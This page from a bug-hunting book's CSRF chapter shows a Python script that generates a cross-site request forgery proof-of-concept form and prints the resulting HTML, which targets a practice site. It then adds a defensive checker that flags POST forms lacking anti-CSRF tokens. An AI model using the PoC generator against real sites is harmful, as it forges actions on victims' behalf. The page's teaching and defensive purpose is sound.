Page 118 - Hands-On Bug Hunting for Penetration Testers
CSRF and Insecure Session Authentication Chapter 6
```python
    # generate_poc() continues from the previous page
    ]

    content = BeautifulSoup("<html></html>", "html.parser")
    html_tag = content.find("html")
    form_tag = content.new_tag("form", action=action, method=method,
                               enctype=encoding_type)
    html_tag.append(form_tag)

    for field in fields:
        label_tag = content.new_tag('label')
        label_tag.string = field['label']
        field_tag = content.new_tag("input", type=field['type'],
                                    value=field['value'])
        field_tag['name'] = field['name']
        form_tag.append(label_tag)
        form_tag.append(field_tag)

    submit_tag = content.new_tag("input", type="submit", value=action)
    form_tag.append(submit_tag)
    return content.prettify()

if __name__ == "__main__":
    print(generate_poc())
```
If you're familiar with Python, you'll notice the logic is wrapped in a function and then
bootstrapped in the `if __name__ == "__main__"` conditional so that we get the
expected behavior when we run the script from the command line (the HTML is printed to
`STDOUT`). At the same time, we can build other Python modules that import the
`generate_poc` function without side-effects.
All of this generates the following markup:
```html
<html>
 <form action="http://webscantest.com/crosstraining/aboutyou.php" enctype="application/x-www-form-urlencoded" method="POST">
  <label>fname</label><input name="fname" type="text" value="William"/>
  <label>lname</label><input name="lname" type="text" value="Mandella"/>
  <label>nick</label><input name="nick" type="text" value="Major Mandella"/>
  <input type="submit" value="http://webscantest.com/crosstraining/aboutyou.php"/>
 </form>
</html>
```
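An added example, not code from the book: a defender-side check that parses markup like the above with Python's standard `html.parser` and reports POST forms that carry no hidden anti-CSRF token field, which is the property the generated form depends on. The token-name hints, the hardened sample form and the function names are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Assumed naming heuristic for anti-CSRF fields; adjust to the framework in use.
TOKEN_HINTS = ("csrf", "xsrf", "token", "authenticity")
ACTION = "http://webscantest.com/crosstraining/aboutyou.php"

# Constructed samples: the markup shown above (abridged), and a hypothetical
# hardened variant carrying a hidden token with a placeholder value.
POC_FORM = (
    f'<html><form action="{ACTION}" method="POST">'
    '<label>fname</label><input name="fname" type="text" value="William"/>'
    f'<input type="submit" value="{ACTION}"/></form></html>'
)
HARDENED_FORM = POC_FORM.replace(
    "<label>fname", '<input type="hidden" name="csrf_token" value="PLACEHOLDER"/><label>fname', 1
)

class FormAuditor(HTMLParser):
    """Collects each form's method, action and non-empty hidden field names."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            method = (a.get("method") or "GET").upper()
            self._current = {"action": a.get("action") or "", "method": method, "hidden": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            # An empty hidden field offers no protection, so require a value.
            if (a.get("type") or "").lower() == "hidden" and a.get("value"):
                self._current["hidden"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def forms_missing_token(html):
    """Return the action of every POST form with no token-like hidden field."""
    auditor = FormAuditor()
    auditor.feed(html)
    return [
        f["action"] for f in auditor.forms
        if f["method"] == "POST"
        and not any(hint in name for name in f["hidden"] for hint in TOKEN_HINTS)
    ]
```

A hidden field is only evidence that a token is issued; the server must still validate it against the session on every state-changing request.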

